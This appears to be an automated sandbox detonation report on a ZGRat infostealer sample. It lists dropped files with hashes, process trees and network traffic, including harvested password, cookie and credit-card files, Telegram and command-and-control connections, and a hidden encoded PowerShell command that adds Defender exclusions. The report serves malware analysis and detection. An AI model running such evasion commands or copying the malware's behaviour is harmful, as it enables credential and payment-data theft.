C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 45ea343e335d2d6400ccbc1e3fc85f11 |
| SHA1 | 7f2267d1f27a076e284696c30a4cf4768fd1a52f |
| SHA256 | f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203 |
| SHA512 | c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1 |
memory/4924-1018-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/5112-1027-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp
memory/4924-1031-0x00000000058A0000-0x00000000058C6000-memory.dmp
memory/4924-1032-0x00000000058D0000-0x00000000058D8000-memory.dmp
memory/4924-1030-0x0000000005810000-0x00000000058A2000-memory.dmp
memory/4924-1035-0x0000000006820000-0x000000000683E000-memory.dmp
memory/4924-1034-0x0000000006800000-0x0000000006808000-memory.dmp
memory/4924-1033-0x00000000067F0000-0x00000000067FA000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/4924-1223-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/4924-1226-0x0000000006C40000-0x0000000006CBA000-memory.dmp
memory/4924-1298-0x0000000007100000-0x00000000071B2000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\System\Debug.txt
| MD5 | e08defb48fa31212026eba24f895a35f |
| SHA1 | c0b9d3c1aec64bf21af878cab77d67999399437d |
| SHA256 | e32ef5b1291cd83151ccce58e0a74f9fc287cbb4276670407972b1f79a2f561e |
| SHA512 | 6beb8c75d37b99674e28010cf6f1bc3862632cc299e1a297c0dfcd987771c5f1249d1818b5b0800b30b478fcf6e83392f75436ec186f3d1c73de67974958ff8d |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\Admin@AAKWQUEG_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/4924-1300-0x0000000006B70000-0x0000000006B92000-memory.dmp
memory/4924-1301-0x0000000007FA0000-0x00000000082F4000-memory.dmp
C:\Users\Admin\AppData\Local\a3c3eac75a665cb7955b2c5159e1dfed\msgid.dat
| MD5 | c010c7aa7b322c786d79b8846cb067ed |
| SHA1 | fbd6564d70b404df38f7357fc5d1439cd44672a1 |
| SHA256 | 9fb3307f61d84c4da05cc9e075a5512d168db16bad673994fc44ff8489b22f6e |
| SHA512 | 1197fc5a15271d40dc3732e9ffb3dc93e148d5714e18ac66c9af7da52b3005e4ea10b848215e566576f605bd72b43d3b5a8c0d2014396d0d493de40069bb873b |
memory/4924-1313-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/4924-1314-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
memory/4924-1315-0x0000000002CA0000-0x0000000002CB0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Avjteuhlk.dat
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
2s
Max time network
88s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"
C:\Users\Admin\AppData\Local\Temp\rock.exe
"C:\Users\Admin\AppData\Local\Temp\rock.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | tcp | |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | tcp | |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
Files
memory/1200-0-0x0000000000E10000-0x0000000001382000-memory.dmp
memory/1200-1-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/1200-2-0x0000000001B80000-0x0000000001B90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | b5a9a31834ca48de5da58107f646a2a6 |
| SHA1 | 18de389616225e3d740d288262a5c5bca5f11fc4 |
| SHA256 | 52df0926bf74c947e9959bd680421d47dab959a0fa12402127c7eb587b7a1d95 |
| SHA512 | eeed1552481a59c748feb68f5d9d701e261d2e4bd250ecb399274b4f5bca8101a35520cf2891447ba3cdded40ceca70e546d3090abd1eaf979c0a16a661c566b |
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 69e9f5b9e1c5ef06143471ae6022f996 |
| SHA1 | fb74e045c41ef9fa9a11d3ec88ace82bb82f1729 |
| SHA256 | 70ba794963458cf9a8373869cf91aa234ecbdd596d2069237d1282718c3a68e7 |
| SHA512 | 57f75155c86a1079bfdc735a96c5ea6438e5227fc4e5b15ebd7fb329929a54e0d434700508700b1083d3fdc08a99b13c4e4cad9e33d621a6a8f4aaaa1272df87 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 6fba0bc9d0671236ec252f7c5b014d57 |
| SHA1 | ab4a0d7bd02e3c1d259553085214ae6f5dae3177 |
| SHA256 | 7c6c4ec6dbd68f2c0947cb46d6d3d4b091321c2209344332b59d97e177b6ca83 |
| SHA512 | 8b69836353df340a1df412e6e926d41c2e1a9d3cb2ae6cbf751f4d68990f1c92475492aab0ef52e364329303018a4e3999d4cae72de2ae9a13aa9af249783d43 |
memory/2576-32-0x0000027390990000-0x0000027390B08000-memory.dmp
memory/1200-34-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/2576-33-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/3892-36-0x0000000000B80000-0x0000000000C1C000-memory.dmp
memory/3892-35-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | e483b733c95b33af0dc4257eeaf24ff2 |
| SHA1 | 8e51b0545596abb59361dd71999524eebd481908 |
| SHA256 | 562bfea0a5e27bb37cfdcf26397989d7a1b48ee34dbe0ceeaf50c2a5b110791f |
| SHA512 | 8db7cc418ffea771f6937e326bec01f86a48ddd1019998e6217d2d0cc532301b33a0a05aa6b377c7b9e549093dd95ca69a8bce9728223e8bb055d2d1ee640f83 |
memory/2576-37-0x00000273AB170000-0x00000273AB180000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 21656b2a4a4b65faff027532bd7f1504 |
| SHA1 | 957cf154d9447d2bb1498fab227b0ced0bf65d2c |
| SHA256 | 49e25464f406c4df62df2ef15bebc68f36058d0feb9fae1ff60d6441d2528b36 |
| SHA512 | 7980929460c9d0d4eb453571b201b08e9db272b4bc3dad242b6d66cd4db066253bf25f6e1678094d170f24295c8eb5c9cf9930c5395e22fd15b102219541db91 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | c1fcd3f9800bbfb95a0e9c2cb7ca20b2 |
| SHA1 | c65076ad5f65b7fe8e72cf7db2d0da7fe6d16d53 |
| SHA256 | 1b297af1fd0406ddf9f645636db79438761650b3d03adba24c2739d137fcaf14 |
| SHA512 | 4867f657c6d060308364310dc53eaad7835f8721cac5f1eaa965716859d5293aca31ed0bd55fa3266c76ad8298a872fa96e2717440438ec533d65072b82b31ce |
memory/3892-38-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/3892-39-0x00000000054A0000-0x0000000005588000-memory.dmp
memory/3892-41-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-43-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-52-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-58-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-60-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-64-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-70-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/2576-73-0x00000273AB100000-0x00000273AB150000-memory.dmp
memory/3892-75-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-82-0x00000000054A0000-0x0000000005582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | 36f6acc2229073f5bb4074cee73d1d5b |
| SHA1 | b2adbb44350d984dff40c15fcbbeb3379c7ec0e5 |
| SHA256 | 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35 |
| SHA512 | da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad |
memory/3892-115-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-121-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-127-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-135-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-137-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-133-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-131-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-129-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-125-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-123-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-119-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-117-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-113-0x00000000054A0000-0x0000000005582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3892-90-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-72-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-68-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-66-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-62-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-56-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-54-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-50-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-48-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-46-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/3892-40-0x00000000054A0000-0x0000000005582000-memory.dmp
memory/2576-463-0x00007FF80F340000-0x00007FF80FE01000-memory.dmp
memory/3892-2288-0x0000000005690000-0x00000000056DC000-memory.dmp
memory/3892-2287-0x0000000005630000-0x0000000005686000-memory.dmp
memory/3892-2289-0x0000000005850000-0x00000000058B6000-memory.dmp
memory/3892-2290-0x0000000005C70000-0x0000000005CC4000-memory.dmp
memory/3892-2293-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2168-2296-0x0000020630B40000-0x0000020630B50000-memory.dmp
memory/2168-2306-0x00000206490D0000-0x00000206490F2000-memory.dmp
memory/2168-2307-0x0000020630B40000-0x0000020630B50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joffblep.we4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-2295-0x0000020630B40000-0x0000020630B50000-memory.dmp
memory/2168-2294-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/2168-2310-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
| MD5 | b436f694b4f5182e9f31c4eae47bb0fb |
| SHA1 | 3d0d136ec3e24c2dbc205b71770c6125effc8936 |
| SHA256 | 08206dcfb5782fa050ae2462abc8076fe4a72defb96db46c8bde9f6295746e79 |
| SHA512 | 7e2cda355d78dfe8f23a6709967c327f871628e6f9cff879d32adcd58dfde62963eca1c04cb442fd548ccc67b444b8a9329617d775504c3654c5910e12f7cfc9 |
C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
| MD5 | 06bf68af8360c9c6fe3ebd5f59c03495 |
| SHA1 | 9149177f83ff4da16ab8bb9b77c94e5b55f3b454 |
| SHA256 | fd9fd323b5934ecfc817a62a688a428bae61bbc80a12e43fe20637e9bfc47a50 |
| SHA512 | 95435c8c23b7c295fd08a0cd200c95d29183e5675a71f32ba6a6feba8bbee2ec8657d7364c97a46f6bf3fed404732898720768a56a48ece29ad8cd5b64266915 |
memory/3984-2314-0x0000000002930000-0x0000000002940000-memory.dmp
memory/3984-2313-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2960-4522-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/3984-4523-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2960-4521-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1148-5654-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/1148-5656-0x0000028263D40000-0x0000028263D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/1148-5989-0x0000028263D40000-0x0000028263D50000-memory.dmp
memory/1148-6205-0x0000028263D40000-0x0000028263D50000-memory.dmp
memory/1148-6745-0x00007FF80EF30000-0x00007FF80F9F1000-memory.dmp
memory/2960-6746-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 0b97baabefc29ff0dffd2ccaab0a208f |
| SHA1 | aac9bed37cabfc6728ecd4d3d5e241c965071a0e |
| SHA256 | ebf6065c587ef7db9230d9811d4cb4d2bb3e9f947036c7f3aae704e77137bb32 |
| SHA512 | 71a5712b119249a583b59688bb2e461cb7b320fd1575ed3fc8c5ced95b75405b7dab2194035d2a511ae9a6529968711c599942077efc3bece6d5f6ec1f6a48d9 |
memory/2576-6751-0x00000000001F0000-0x000000000020C000-memory.dmp
memory/2576-6752-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/2576-6753-0x0000000004A70000-0x0000000004A80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2576-6754-0x0000000005580000-0x00000000056B6000-memory.dmp
memory/2576-7687-0x00000000056B0000-0x00000000056B1000-memory.dmp
memory/2576-7688-0x00000000058B0000-0x000000000597E000-memory.dmp
memory/2576-7689-0x0000000006160000-0x0000000006704000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nxryyws.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/3560-7694-0x0000000000400000-0x0000000000578000-memory.dmp
memory/3560-7697-0x0000000005830000-0x00000000058C2000-memory.dmp
memory/3560-7698-0x0000000005A80000-0x0000000005A90000-memory.dmp
memory/2576-7696-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/3560-7695-0x0000000074BB0000-0x0000000075360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
| MD5 | 20431b8ed3a072f81845a821249a01af |
| SHA1 | 6f15694b5fde1fdec4674928226f45499522f141 |
| SHA256 | 56743a8bbb6d27acad0101d325b1a264156394dd11908da039f95209e5a0d388 |
| SHA512 | fa391aafbf5a81f868f1559e24ee040b5c0c7cf5be5e20669fdefbcc68daeae355899fe9723e245cd76d272ab0fce024896badc3002914264caf6ed031ece4fe |
memory/3560-7699-0x0000000006770000-0x000000000677A000-memory.dmp
memory/3560-7700-0x0000000008FD0000-0x0000000009020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt
| MD5 | 824ce7c07117a630e9b31638f89476aa |
| SHA1 | 2d012f1cd8b636de1662f69d213b3cf9fa5df846 |
| SHA256 | 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd |
| SHA512 | 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945 |
memory/3560-7741-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/3560-7740-0x0000000005A80000-0x0000000005A90000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
0s
Max time network
147s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Pphucxdmff.dat
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
